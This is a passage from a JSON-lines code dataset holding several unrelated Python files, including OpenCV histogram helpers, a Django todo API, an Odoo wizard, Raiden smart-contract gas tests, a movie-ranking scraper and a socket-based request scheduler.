coo2.append(bb.split()[1])\n except:continue\n nn+=1\n\n answ,answ1=\"-\",\"-\"\n while answ[0]!='q':\n answ =input(\">> #number of artstar to show,[0,50], or q-uit:\")\n if len(answ)>0: \n if '#' in answ:\n nn = int(answ[1:])\n if nn >= int(50) or nn <= int(0):\n answ='q'\n print('out of range')\n else:\n print(int(answ[1:]),'of 50 chosen'+'\\n'+'*'*50+'\\n')\n print('coodiantes:',coo1[nn],coo2[nn])\n for ii in range(len(zgw1)):\n print(ii,zgw1[ii])\n answ1 =input(\">> And the #distance, or q-uit:\")\n if len(answ1)>0:\n if '#' in answ1:\n try:\n rs = zgw1[int(answ1[1:])] \n print(rs,'chosen'+'\\n'+'*'*50+'\\n')\n except:\n sys.exit\n for d in range(len(number)):\n if int(number[d]) == nn:\n xc,yc = coo1[d],coo2[d]\n gw_stamps(dataou,dataou,trigger,filtro,p,all_list[p],float(xc),float(yc), False,50,directory,maglist,i,rs,number[d])\n else:sys.exit()\n else:sys.exit()\n else:sys.exit()\n else: sys.exit()\n sys.exit()\n\n\n trash = glob.glob('tmp*') # remove temporary files\n for t in trash: os.remove(t)\n\n message = \"******* Completed in \"+str(int(time.time()-start_time))+\" sec\" \n print(message)\n","sub_path":"bin/gw_all_artcheck.py","file_name":"gw_all_artcheck.py","file_ext":"py","file_size_in_byte":25139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"83374308","text":"# Authors: CS-World Domination Summer19 - DM\r\nimport cv2 as cv\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\nimport os\r\nimport os.path\r\nimport shutil\r\n\r\n# NOTE: The helper function hist_match is taken directly from the following stackoverflow post. \r\n# Apparently there are no libraries that do color-histogram matching.\r\n# https://stackoverflow.com/questions/32655686/histogram-matching-of-two-images-in-python-2-x\r\n# \r\n# The link below is also probably worth taking a look at, if you want to use MATLAB's matching function instead.\r\n# https://www.mathworks.com/help/matlab/matlab-engine-for-python.html?searchHighlight=python&s_tid=doc_srchtitle\r\n\r\n\r\ndef histBGR(file):\r\n \"Press space for color-intensity histogram of the image's bgr values\"\r\n image = cv.imread(file, 1) # -1 alpha, 0 gray, 1 color\r\n while True:\r\n k = cv.waitKey(10) & 0xFF\r\n k_char = chr(k)\r\n if k_char == ' ':\r\n print(\"Displaying histogram!\")\r\n color = ['b','g','r']\r\n for i,col in enumerate(color):\r\n histr = cv.calcHist([image],[i],None,[256],[0,256])\r\n # NOTE: Using an argument other than None lets you creates a hist for a specified section of the image\r\n plt.plot(histr,color = col)\r\n plt.xlim([0,256])\r\n plt.show()\r\n # Display the resulting image\r\n cv.imshow(file, image)\r\n # End the Video Capture\r\n if k == 27: # ESC key, See https://keycode.info for other keycodes\r\n print(\"Closed image windows!\")\r\n break\r\n cv.destroyWindow(file)\r\n return\r\n\r\ndef histEqual(file):\r\n \"Returns the image result of equalizehist: makes the Equalized Data more spread out than Original Data\"\r\n image = cv.imread(file, 0) # -1 alpha, 0 gray, 1 color\r\n EQimage = cv.equalizeHist(image) # Equalization only works with grayscale images\r\n while True:\r\n k = cv.waitKey(10) & 0xFF\r\n k_char = chr(k)\r\n if k_char == ' ':\r\n print(\"Displaying histogram!\")\r\n hist1 = cv.calcHist([image],[0],None,[256],[0,256])\r\n hist2 = cv.calcHist([EQimage],[0],None,[256],[0,256])\r\n line2, = plt.plot(hist2,label=\"Equalized Data\",color='brown')\r\n line1, = plt.plot(hist1,label=\"Original Data\",color='black',linestyle='dashed')\r\n first_legend = plt.legend(handles=[line2], loc=1)\r\n ax = plt.gca().add_artist(first_legend)\r\n plt.legend(handles=[line1], loc=4)\r\n plt.xlim([0,256])\r\n plt.show()\r\n # Display the resulting image\r\n cv.imshow(file, image)\r\n cv.imshow(\"EQ_\"+file, EQimage)\r\n # Close open image windows\r\n if k == 27: # ESC key, See https://keycode.info for other keycodes\r\n print(\"Closed image windows!\")\r\n break\r\n cv.destroyWindow(file)\r\n cv.destroyWindow(\"EQ_\"+file)\r\n return EQimage\r\n\r\ndef histColorMatch(srcFile, tempFile):\r\n \"Only works on grayscale, matches the color histogram of srcFile to tempFile's color histogram\"\r\n # NOTE: See https://en.wikipedia.org/wiki/Histogram_matching for a description of this algorithm\r\n imageSrc = cv.imread(srcFile, 0) # -1 alpha, 0 gray, 1 color\r\n imageTemp = cv.imread(tempFile, 0) # -1 alpha, 0 gray, 1 color\r\n imageMatch = hist_match(imageSrc, imageTemp).astype(np.uint8)\r\n while True:\r\n k = cv.waitKey(10) & 0xFF\r\n k_char = chr(k)\r\n if k_char == ' ':\r\n print(\"Displaying histogram!\")\r\n hist1 = cv.calcHist([imageSrc],[0],None,[256],[0,256])\r\n hist2 = cv.calcHist([imageTemp],[0],None,[256],[0,256])\r\n hist3 = cv.calcHist([imageMatch],[0],None,[256],[0,256])\r\n line3, = plt.plot(hist3,label=\"MatchResult Data\",color='blue')\r\n line2, = plt.plot(hist2,label=\"Template Data\",color='red')\r\n line1, = plt.plot(hist1,label=\"Source Data\",color='black')\r\n first_legend = plt.legend(handles=[line2], loc=1)\r\n ax = plt.gca().add_artist(first_legend)\r\n plt.legend(handles=[line1], loc=4)\r\n plt.xlim([0,256])\r\n plt.show()\r\n # Display the resulting image\r\n cv.imshow(\"srcFile\", imageSrc)\r\n cv.imshow(\"tempFile\", imageTemp)\r\n cv.imshow(\"matchResult\", imageMatch)\r\n # End the Video Capture\r\n if k == 27: # ESC key, See https://keycode.info for other keycodes\r\n print(\"Closed image windows!\")\r\n break\r\n cv.destroyAllWindows()\r\n return\r\n\r\ndef hist_match(source, template):\r\n # NOTE: This function was taken from the stack overflow post\r\n oldshape = source.shape\r\n source = source.ravel()\r\n template = template.ravel()\r\n\r\n # get the set of unique pixel values and their corresponding indices and\r\n # counts\r\n s_values, bin_idx, s_counts = np.unique(source, return_inverse=True, return_counts=True)\r\n t_values, t_counts = np.unique(template, return_counts=True)\r\n\r\n # take the cumsum of the counts and normalize by the number of pixels to\r\n # get the empirical cumulative distribution functions for the source and\r\n # template images (maps pixel value --> quantile)\r\n s_quantiles = np.cumsum(s_counts).astype(np.float64)\r\n s_quantiles /= s_quantiles[-1]\r\n t_quantiles = np.cumsum(t_counts).astype(np.float64)\r\n t_quantiles /= t_quantiles[-1]\r\n\r\n # interpolate linearly to find the pixel values in the template image\r\n # that correspond most closely to the quantiles in the source image\r\n interp_t_values = np.interp(s_quantiles, t_quantiles, t_values)\r\n\r\n return interp_t_values[bin_idx].reshape(oldshape)\r\n\r\ndef main():\r\n histBGR(\"messi5.jpg\")\r\n histEqual(\"treelc.jpg\")\r\n histColorMatch(\"f1.jpg\", \"f5.jpg\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"OpenCV-Examples/Image Histograms/other-histogram-functions.py","file_name":"other-histogram-functions.py","file_ext":"py","file_size_in_byte":5864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"415187528","text":"# -*- coding: utf-8 -*-\n\nimport json\n\nfrom django.views.generic import View\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.utils.decorators import method_decorator\nfrom django.shortcuts import get_object_or_404\n\nfrom .models import TodoManager, Todo\n\n\nclass IndexView(View):\n\ttemplate_name = 'primary_app/index.html'\n\n\tdef get(self, request, *args, **kwargs):\n\t\treturn render(request, self.template_name)\n\n\nclass TodosView(View):\n\t@method_decorator(csrf_exempt)\n\tdef dispatch(self, request, *args, **kwargs):\n\t return super(TodosView, self).dispatch(request, *args, **kwargs)\n\n\tdef get(self, request, *args, **kwargs):\n\t\tif kwargs.has_key('id'):\n\t\t\tobj = get_object_or_404(Todo, id=kwargs['id'])\n\t\t\tresult = json.dumps(obj.get_data_dict())\n\t\t\treturn HttpResponse(result)\n\t\telse:\n\t\t\tresult = TodoManager.get_all_todos()\n\t\t\treturn HttpResponse(result)\n\n\tdef post(self, request, *args, **kwargs):\n\t\traw_data = request.body\n\t\tparsed_data = json.loads(raw_data)\n\t\tdone = parsed_data['done']\n\t\ttodo = parsed_data['todo']\n\t\tif done == '1':\n\t\t\tdone = True\n\t\telif done == '0':\n\t\t\tdone = False\n\t\tobj = Todo(\n\t\t\tdone=done,\n\t\t\ttodo=todo\n\t\t\t)\n\t\tobj.save()\n\t\tresult = json.dumps({\n\t\t\t'id': obj.id,\n\t\t})\n\t\treturn HttpResponse(result)\n\n\tdef delete(self, request, *args, **kwargs):\n\t\tid = kwargs['id']\n\t\tobj = Todo.objects.get(id=id)\n\t\tobj.delete()\n\t\treturn HttpResponse(status=204)\n\n\tdef put(self, request, *args, **kwargs):\n\t\traw_data = request.body\n\t\tparsed_data = json.loads(raw_data)\n\n\t\to_id = parsed_data['id']\n\t\tobj = get_object_or_404(Todo, id=o_id)\n\n\t\tif parsed_data.has_key('done'):\n\t\t\tobj.done = parsed_data['done']\n\t\tif parsed_data.has_key('todo'):\n\t\t\tobj.todo = parsed_data['todo']\n\n\t\tobj.save()\n\t\treturn HttpResponse(status=204)\n\n","sub_path":"primary_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"397394651","text":"#!/usr/bin/env python\n\n# enums.py\n#\n# Sam Heilbron\n# Last Updated: December 8, 2016\n#\n# List of enums:\n#\t\tColor\n\n\ndef enum(**named_values):\n\treturn type('Enum', (), named_values)\n\nColor = enum(\n\tBLACK \t= (0, 0, 0),\n\tWHITE \t= (255, 255, 255),\n\tRED \t= (0, 0, 255),\n\tGREEN \t= (0, 255, 0),\n\tBLUE \t= (255, 0, 0),\n\tYELLOW\t= (0, 255, 255))\n\nDatatypes = enum(\n\tFLOAT64 = 'float64',\n\tINT\t\t= 'int',\n\tINT16\t= 'int16',\n\tUINT8\t= 'uint8')","sub_path":"ws_interlace/number_recognition/enums.py","file_name":"enums.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"504812862","text":"# Created By: Virgil Dupras\n# Created On: 2006/11/18\n# Copyright 2010 Hardcoded Software (http://www.hardcoded.net)\n# \n# This software is licensed under the \"BSD\" License as described in the \"LICENSE\" file, \n# which should be included with this package. The terms are also available at \n# http://www.hardcoded.net/licenses/bsd_license\n\nimport os\nimport os.path as op\n\nimport hsfs as fs\nfrom hsfs import phys\nfrom hsfs.stats import StatsList\nfrom hscommon.conflict import get_unconflicted_name, get_conflicted_name\nfrom hscommon.util import tryint, format_size, format_time, multi_replace\nfrom jobprogress.job import JobCancelled\nfrom hscommon.reg import RegistrableApplication\n\nfrom . import design\nfrom .fs_utils import BatchOperation, FS_FORBIDDEN\nfrom .util import clean_empty_dirs\nfrom .sqlfs.music import Root, VOLTYPE_CDROM, VOLTYPE_FIXED, MODE_PHYSICAL, MODE_NORMAL\n\nclass MusicGuru(RegistrableApplication):\n VERSION = '1.4.3'\n \n def __init__(self, appdata=None):\n RegistrableApplication.__init__(self, appid=3)\n if appdata is None:\n appdata = op.expanduser(op.join('~', '.hsoftdata', 'musicguru'))\n self.appdata = appdata\n if not op.exists(self.appdata):\n os.makedirs(self.appdata)\n self.collection = Root(op.join(appdata, 'music.db'))\n self.board = design.Board()\n \n def AddLocation(self, path, name, removeable, job):\n vol_type = VOLTYPE_CDROM if removeable else VOLTYPE_FIXED\n ref = phys.music.Directory(None, path)\n self.collection.add_volume(ref, name, vol_type, job)\n \n def CanAddLocation(self, path, name):\n #returns None is it is possible to add the location, and returns the error msg otherwise.\n if not name:\n return \"A location cannot have an empty name.\"\n if name in self.collection:\n return \"'%s' is already in your collection. Choose another name.\" % name\n if (not path) or (not os.path.exists(path)):\n return \"'%s' is not a valid directory.\" % path\n already_there = [location for location in self.collection \n if (location.vol_type != VOLTYPE_CDROM) and (str(location.physical_path) == path)]\n if already_there:\n return \"The directory '%s' is already in your collection as the location '%s'.\" % (path,already_there[0].name)\n return \"\"\n \n def GetSelectionInfo(self, item):\n def output_stats(info, item):\n info.append(('Size',format_size(item.get_stat('size'),2)))\n info.append(('Time',format_time(item.get_stat('duration'), with_hours=False)))\n info.append(('Extensions',','.join(item.get_stat('extension',[]))))\n info.append(('# Artists',len(item.get_stat('artist',[]))))\n info.append(('# Albums',len(item.get_stat('album',[]))))\n info.append(('# Genres',len(item.get_stat('genre',[]))))\n stats = item.get_stat('year',[])\n years = [tryint(s) for s in stats if s]\n if not years:\n years = [0]\n minyear = min(years)\n maxyear = max(years)\n info.append(('Years',\"%d - %d\" % (minyear,maxyear)))\n \n new_info = []\n if isinstance(item,list) and (len(item) == 1):\n item = item[0]\n if isinstance(item,list):\n if item:\n new_item = StatsList()\n #remove all items with their parent in the list\n new_item += [child for child in item if child.parent not in item]\n new_info.append(('Selection',\"%d selected\" % len(item)))\n filecount = new_item.get_stat('filecount')\n if filecount is None:\n filecount = 0\n filecount += len([child for child in new_item if not child.is_container])\n new_info.append(('Songs',filecount))\n output_stats(new_info,new_item)\n elif item.is_container:\n new_info.append(('Path',str(item.path[1:])))\n new_info.append(('Songs',item.get_stat('filecount')))\n output_stats(new_info,item)\n else:\n new_info.append(('Filename',item.name))\n new_info.append(('Directory',str(item.parent.path[1:])))\n new_info.append(('Title',item.title))\n new_info.append(('Artist',item.artist))\n new_info.append(('Album',item.album))\n new_info.append(('Genre',item.genre))\n new_info.append(('Year',item.year))\n new_info.append(('Track',\"%02d\" % item.track))\n new_info.append(('Size',format_size(item.size,2)))\n new_info.append(('Time',format_time(item.duration, with_hours=False)))\n new_info.append(('Bitrate',item.bitrate))\n new_info.append(('Comment',item.comment))\n return new_info\n \n def new_folder(self, parent):\n new_name = get_conflicted_name(parent, 'New Folder')\n new_folder = fs.manual.AutoMerge(parent, new_name)\n return new_folder.name\n \n def RemoveEmptyDirs(self):\n self.board.clean_empty_dirs()\n self.board.ignore_box.clean_empty_dirs()\n \n def RenameNode(self,node,new_name):\n #Returns what the node has actually been renamed to\n node.name = multi_replace(new_name,FS_FORBIDDEN)\n return node.name\n \n def SwitchConflictAndOriginal(self,node):\n original_name = get_unconflicted_name(node.name)\n try:\n original = node.parent[original_name]\n old_name = node.name\n original.name = '__switching__'\n node.name = original_name\n original.name = old_name\n except KeyError:\n node.name = original_name\n return original\n \n #---Materialize\n def CopyOrMove(self,copy,destination,job,on_need_cd):\n job = job.start_subjob(2)\n for location in self.board.locations:\n location.mode = MODE_PHYSICAL\n try:\n bo = BatchOperation(self.board,destination)\n bo.OnNeedCD = on_need_cd\n if copy:\n bo.copy(job)\n else:\n bo.rename(job)\n for location in self.board.locations:\n if location.vol_type != VOLTYPE_CDROM:\n try:\n clean_empty_dirs(location.path, files_to_delete=['.DS_Store'])\n except EnvironmentError:\n pass\n location.mode = MODE_NORMAL\n self.collection.update_volumes(job)\n except JobCancelled:\n for location in self.board.locations:\n location.mode = MODE_NORMAL\n \n def RenameInRespectiveLocations(self,job):\n #XXX Refactor: Return value isn't used in any gui port.\n for location in self.board.locations:\n if location.vol_type == VOLTYPE_CDROM:\n return 1\n j = job.start_subjob(len(self.board.locations) + 1)\n try:\n for location in self.board.locations:\n location.mode = MODE_PHYSICAL\n destination = location.path\n source_list = [song for song in self.board.allfiles if location in song.original.parents]\n bo = BatchOperation(source_list,destination)\n bo.rename(j)\n try:\n clean_empty_dirs(location.path, files_to_delete=['.DS_Store'])\n except EnvironmentError:\n pass\n location.mode = MODE_NORMAL\n self.collection.update_volumes(j)\n return 0\n except JobCancelled:\n return 2\n","sub_path":"core/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"355480121","text":"# -*- coding: utf-8 -*-\n##############################################################################\n# Copyright (c) 2021-Present IjVine Corporation ()\n\n##############################################################################\n\nfrom odoo import api,fields,models,_\nfrom logging import getLogger\n_logger=getLogger(__name__)\n\n\nclass FeedSyncWizard(models.TransientModel):\n\t_name='feed.sync.wizard'\n\t_description='Evaluate Feeds Wizard'\n\n\tchannel_id=fields.Many2one(\n\t\tcomodel_name='multi.channel.sale',\n\t\tstring='Channel ID',\n\t\trequired=True,\n\t\treadonly=True,\n\t\tdomain=[('state','=','validate')]\n\t)\n\n\tfeed_type=fields.Selection(\n\t\tselection=[\n\t\t\t('product.feed','Product'),\n\t\t\t('category.feed','Category'),\n\t\t\t('order.feed','Order'),\n\t\t\t('partner.feed','Partner'),\n\t\t\t('shipping.feed','Shipping')\n\t\t],\n\t\tstring='Feed Type',\n\t\trequired=True\n\t)\n\n\tdef action_sync_feed(self):\n\t\tself.ensure_one()\n\t\tres = self.env[self.feed_type].search(\n\t\t\t[\n\t\t\t\t('channel_id','=',self.channel_id.id),\n\t\t\t\t('state','!=','done'),\n\t\t\t]\n\t\t).with_context(channel_id=self.channel_id).import_items()\n\t\treturn res\n","sub_path":"ijvine_ebay/ijvine_ebay_base/wizard/feed_wizard.py","file_name":"feed_wizard.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"312556023","text":"import urllib.request as req\nfrom bs4 import BeautifulSoup\nimport requests\n'''\n \n'''\nurl=\"https://movie.naver.com/movie/sdb/rank/rmovie.nhn\"\nmovie_data=requests.get(url)\nmovie_data=movie_data.text\n#print(movie_data)\nsoup=BeautifulSoup(movie_data,'html.parser')\nmList=soup.select(\".title > .tit3 > a\")\nfor movie_title in mList:\n print(movie_title.attrs['href'])\n print(movie_title.text)","sub_path":"PythonBasicProject6/python_basic/basic6.py","file_name":"basic6.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"202220497","text":"from raiden_contracts.constants import (\n CONTRACT_ENDPOINT_REGISTRY,\n CONTRACT_TOKEN_NETWORK_REGISTRY,\n CONTRACT_TOKEN_NETWORK,\n CONTRACT_SECRET_REGISTRY,\n TEST_SETTLE_TIMEOUT_MIN,\n TEST_SETTLE_TIMEOUT_MAX,\n)\nfrom raiden_contracts.utils.pending_transfers import get_pending_transfers_tree, get_locked_amount\nfrom raiden_contracts.utils.merkle import get_merkle_root\n\n\ndef test_token_network_registry(\n web3,\n deploy_tester_contract_txhash,\n secret_registry_contract,\n custom_token,\n print_gas,\n):\n \"\"\" Abusing pytest to print the deployment gas cost of TokenNetworkRegistry \"\"\"\n txhash = deploy_tester_contract_txhash(\n CONTRACT_TOKEN_NETWORK_REGISTRY,\n [],\n [\n secret_registry_contract.address,\n int(web3.version.network),\n TEST_SETTLE_TIMEOUT_MIN,\n TEST_SETTLE_TIMEOUT_MAX,\n ],\n )\n print_gas(txhash, CONTRACT_TOKEN_NETWORK_REGISTRY + ' DEPLOYMENT')\n\n\ndef test_token_network_deployment(\n web3,\n get_accounts,\n print_gas,\n custom_token,\n secret_registry_contract,\n deploy_tester_contract_txhash,\n):\n \"\"\" Abusing pytest to print the deployment gas cost of TokenNetwork \"\"\"\n deprecation_executor = get_accounts(1)[0]\n txhash = deploy_tester_contract_txhash(\n CONTRACT_TOKEN_NETWORK,\n [],\n [\n custom_token.address,\n secret_registry_contract.address,\n int(web3.version.network),\n TEST_SETTLE_TIMEOUT_MIN,\n TEST_SETTLE_TIMEOUT_MAX,\n deprecation_executor,\n ],\n )\n print_gas(txhash, CONTRACT_TOKEN_NETWORK + ' DEPLOYMENT')\n\n\ndef test_token_network_create(\n print_gas,\n custom_token,\n secret_registry_contract,\n token_network_registry_contract,\n contract_deployer_address,\n):\n \"\"\" Abusing pytest to print gas cost of TokenNetworkRegistry's createERC20TokenNetwork() \"\"\"\n txn_hash = token_network_registry_contract.functions.createERC20TokenNetwork(\n custom_token.address,\n ).transact({'from': contract_deployer_address})\n\n print_gas(txn_hash, CONTRACT_TOKEN_NETWORK_REGISTRY + ' createERC20TokenNetwork')\n\n\ndef test_secret_registry(secret_registry_contract, print_gas):\n \"\"\" Abusing pytest to print gas cost of SecretRegistry's registerSecret() \"\"\"\n secret = b'secretsecretsecretsecretsecretse'\n txn_hash = secret_registry_contract.functions.registerSecret(secret).transact()\n print_gas(txn_hash, CONTRACT_SECRET_REGISTRY + '.registerSecret')\n\n\ndef test_channel_cycle(\n web3,\n token_network,\n create_channel,\n channel_deposit,\n secret_registry_contract,\n get_accounts,\n print_gas,\n create_balance_proof,\n create_balance_proof_update_signature,\n):\n \"\"\" Abusing pytest to print gas costs of TokenNetwork's operations \"\"\"\n (A, B, C, D) = get_accounts(4)\n settle_timeout = 11\n\n (channel_identifier, txn_hash) = create_channel(A, B, settle_timeout)\n print_gas(txn_hash, CONTRACT_TOKEN_NETWORK + '.openChannel')\n\n (channel_identifier2, txn_hash) = create_channel(C, D, settle_timeout)\n print_gas(txn_hash, CONTRACT_TOKEN_NETWORK + '.openChannel')\n\n txn_hash = channel_deposit(channel_identifier, A, 20, B)\n print_gas(txn_hash, CONTRACT_TOKEN_NETWORK + '.setTotalDeposit')\n\n txn_hash = channel_deposit(channel_identifier, B, 10, A)\n print_gas(txn_hash, CONTRACT_TOKEN_NETWORK + '.setTotalDeposit')\n\n pending_transfers_tree1 = get_pending_transfers_tree(web3, [1, 1, 2, 3], [2, 1])\n locksroot1 = get_merkle_root(pending_transfers_tree1.merkle_tree)\n locked_amount1 = get_locked_amount(pending_transfers_tree1.transfers)\n\n pending_transfers_tree2 = get_pending_transfers_tree(web3, [3], [], 7)\n locksroot2 = get_merkle_root(pending_transfers_tree2.merkle_tree)\n locked_amount2 = get_locked_amount(pending_transfers_tree2.transfers)\n\n balance_proof_A = create_balance_proof(\n channel_identifier,\n A,\n 10,\n locked_amount1,\n 5,\n locksroot1,\n )\n balance_proof_B = create_balance_proof(\n channel_identifier,\n B,\n 5,\n locked_amount2,\n 3,\n locksroot2,\n )\n balance_proof_update_signature_B = create_balance_proof_update_signature(\n B,\n channel_identifier,\n *balance_proof_A,\n )\n\n for lock in pending_transfers_tree1.unlockable:\n txn_hash = secret_registry_contract.functions.registerSecret(lock[3]).transact({'from': A})\n print_gas(txn_hash, CONTRACT_SECRET_REGISTRY + '.registerSecret')\n\n for lock in pending_transfers_tree2.unlockable:\n txn_hash = secret_registry_contract.functions.registerSecret(lock[3]).transact({'from': A})\n print_gas(txn_hash, CONTRACT_SECRET_REGISTRY + '.registerSecret')\n\n txn_hash = token_network.functions.closeChannel(\n channel_identifier,\n B,\n *balance_proof_B,\n ).transact({'from': A})\n print_gas(txn_hash, CONTRACT_TOKEN_NETWORK + '.closeChannel')\n\n txn_hash = token_network.functions.updateNonClosingBalanceProof(\n channel_identifier,\n A,\n B,\n *balance_proof_A,\n balance_proof_update_signature_B,\n ).transact({'from': B})\n print_gas(txn_hash, CONTRACT_TOKEN_NETWORK + '.updateNonClosingBalanceProof')\n\n web3.testing.mine(settle_timeout)\n txn_hash = token_network.functions.settleChannel(\n channel_identifier,\n B,\n 5,\n locked_amount2,\n locksroot2,\n A,\n 10,\n locked_amount1,\n locksroot1,\n ).transact()\n print_gas(txn_hash, CONTRACT_TOKEN_NETWORK + '.settleChannel')\n\n txn_hash = token_network.functions.unlock(\n channel_identifier,\n A,\n B,\n pending_transfers_tree2.packed_transfers,\n ).transact()\n print_gas(txn_hash, '{0}.unlock {1} locks'.format(\n CONTRACT_TOKEN_NETWORK,\n len(pending_transfers_tree2.transfers),\n ))\n\n txn_hash = token_network.functions.unlock(\n channel_identifier,\n B,\n A,\n pending_transfers_tree1.packed_transfers,\n ).transact()\n print_gas(txn_hash, '{0}.unlock {1} locks'.format(\n CONTRACT_TOKEN_NETWORK,\n len(pending_transfers_tree1.transfers),\n ))\n\n\ndef test_endpointregistry_gas(endpoint_registry_contract, get_accounts, print_gas):\n \"\"\" Abusing pytest to print gas cost of EndpointRegistry's registerEndpoint() \"\"\"\n (A, B) = get_accounts(2)\n ENDPOINT = '127.0.0.1:38647'\n txn_hash = endpoint_registry_contract.functions.registerEndpoint(ENDPOINT).transact({\n 'from': A,\n })\n print_gas(txn_hash, CONTRACT_ENDPOINT_REGISTRY + '.registerEndpoint')\n","sub_path":"raiden_contracts/tests/test_print_gas.py","file_name":"test_print_gas.py","file_ext":"py","file_size_in_byte":6778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"179869582","text":"import pandas as pd\nimport json\nfrom itertools import groupby\nimport pymongo\nimport re\nimport sys\nimport json\n\n\ndef convert(ind):\n outlist = [ind['word'],]\n for k, v in ind['position'].items():\n outlist.append(k)\n outlist.append(str(len(v)))\n outlist.append(str(len(v)))\n for item in v:\n outlist.append(item)\n return outlist\n\n \ndef get_position(query):\n \n myclient = pymongo.MongoClient(\"8.209.74.127:27017\")\n\n mydb = myclient[\"reverseIndex\"]\n mycol = mydb[\"index\"]\n \n r = []\n\n for word in query:\n for i in mycol.find({\"word\" : word}):\n r.append(i)\n \n totallist = [convert(i) for i in r]\n \n return json.dumps(totallist)","sub_path":"from_mongo_to_json.py","file_name":"from_mongo_to_json.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"207387137","text":"import sched\nimport time\nimport datetime\nimport socket\nimport ast\nimport sys\n\nfrom django.core.management.base import BaseCommand\nfrom Parser.models import Request, ParseResult\n\n\ndef time_func():\n\treturn datetime.datetime.now(datetime.timezone.utc)\n\ndef delay_func(delay):\n\tseconds = 0\n\tif delay is datetime.timedelta:\n\t\tseconds = delay.total_seconds()\n\ttime.sleep(seconds)\n\nTIME_FUNC = time_func\nDELAY_FUNC = delay_func\nSCHEDULER = sched.scheduler(TIME_FUNC, DELAY_FUNC)\nSOCK = None\nSERV_ADDR = ('127.0.0.1', 81)\n\ndef update_model(model_obj, data):\n\tParseResult.objects.create(\n\t\t\trequest=model_obj,\n\t\t\tencoding=data['encode'],\n\t\t\ttitle=data['title'],\n\t\t\th1=data['h1'])\n\ndef get_response(request):\n\t\"\"\"\n\tManage one cycle of data swop in client-server system.\n\tReturn: bytes object\n\t\"\"\"\n\tglobal SOCK\n\tSOCK = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ttry:\n\t\tSOCK.connect(SERV_ADDR)\n\texcept ConnectionRefusedError:\n\t\tSOCK.close()\n\t\tprint('ERROR: Server is not reachable. Check connection settings.')\n\t\tsys.exit()\n\tSOCK.sendall(bytes(request, 'cp1251'))\n\tresponse = SOCK.recv(1024)\n\tSOCK.close()\n\treturn response\n\ndef handle(request):\n\t\"\"\"\n\tExecute model update logic.\n\t\"\"\"\n\tresponse = get_response(request)\n\tif response == b'null' or response == b'':\n\t\treturn\n\tresponse = response.decode('utf-8')\n\tresponse_dict = ast.literal_eval(response)\n\trequest_obj = Request.objects.filter(url=request).first()\n\tif ParseResult.objects.filter(request=request_obj).exists():\n\t\treturn\n\tif response_dict is not None:\n\t\tupdate_model(request_obj, response_dict)\n\n\ndef add_event(request, datetime):\n\tSCHEDULER.enterabs(datetime, 0, handle, kwargs={'request': request})\n\ndef load_events(with_old):\n\trequests = None\n\tif with_old == True:\n\t\trequests = Request.objects.all()\n\telif with_old == False:\n\t\trequests = Request.objects.filter(handling_time__gte=TIME_FUNC())\n\tfor r in requests:\n\t\tadd_event(r.url, r.handling_time)\n\nclass Command(BaseCommand):\n\thelp = 'Shedule requests to server and manage model update based on response.'\n\n\tdef handle(self, *args, **kwargs):\n\t\tload_events(with_old=True)\n\t\tSCHEDULER.run()","sub_path":"Parser/management/commands/runscheduler.py","file_name":"runscheduler.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"345575625","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport itertools\nimport math\n\nimport numpy as np\nfrom scipy.linalg import norm, svd\nfrom scipy.signal import decimate\n\n# general messages for LM/etc optimization\nTERMINATION_MESSAGES = {\n None: \"Status returned `None`. Error.\",\n -1: \"Improper input parameters status returned from `leastsq`\",\n 0: \"The maximum number of iterations is exceeded.\",\n 1: \"`gtol` termination condition is satisfied. (small change in Jacobian)\",\n 2: \"`ftol` termination condition is satisfied. (small change in cost)\",\n 3: \"`xtol` termination condition is satisfied. (small step)\",\n 4: \"Both `ftol`(cost) and `xtol`(step) termination conditions are satisfied.\"\n}\n\n\nclass color:\n PURPLE = '\\033[95m'\n CYAN = '\\033[96m'\n DARKCYAN = '\\033[36m'\n BLUE = '\\033[94m'\n GREEN = '\\033[92m'\n YELLOW = '\\033[93m'\n RED = '\\033[91m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n END = '\\033[0m'\n\n\ndef next_pow2(i):\n \"\"\"\n Find the next power of two\n\n >>> int(next_pow2(5))\n 8\n >>> int(next_pow2(250))\n 256\n \"\"\"\n # do not use NumPy here, math is much faster for single values\n exponent = math.ceil(math.log(i) / math.log(2))\n # the value: int(math.pow(2, exponent))\n return exponent\n\n\ndef prime_factor(n):\n \"\"\"Find the prime factorization of n\n\n Efficient implementation. Find the factorization by trial division, using\n the optimization of dividing only by two and the odd integers.\n\n An improvement on trial division by two and the odd numbers is wheel\n factorization, which uses a cyclic set of gaps between potential primes to\n greatly reduce the number of trial divisions. Here we use a 2,3,5-wheel\n\n Factoring wheels have the same O(sqrt(n)) time complexity as normal trial\n division, but will be two or three times faster in practice.\n\n >>> list(factors(90))\n [2, 3, 3, 5]\n \"\"\"\n f = 2\n increments = itertools.chain(\n [1, 2, 2], 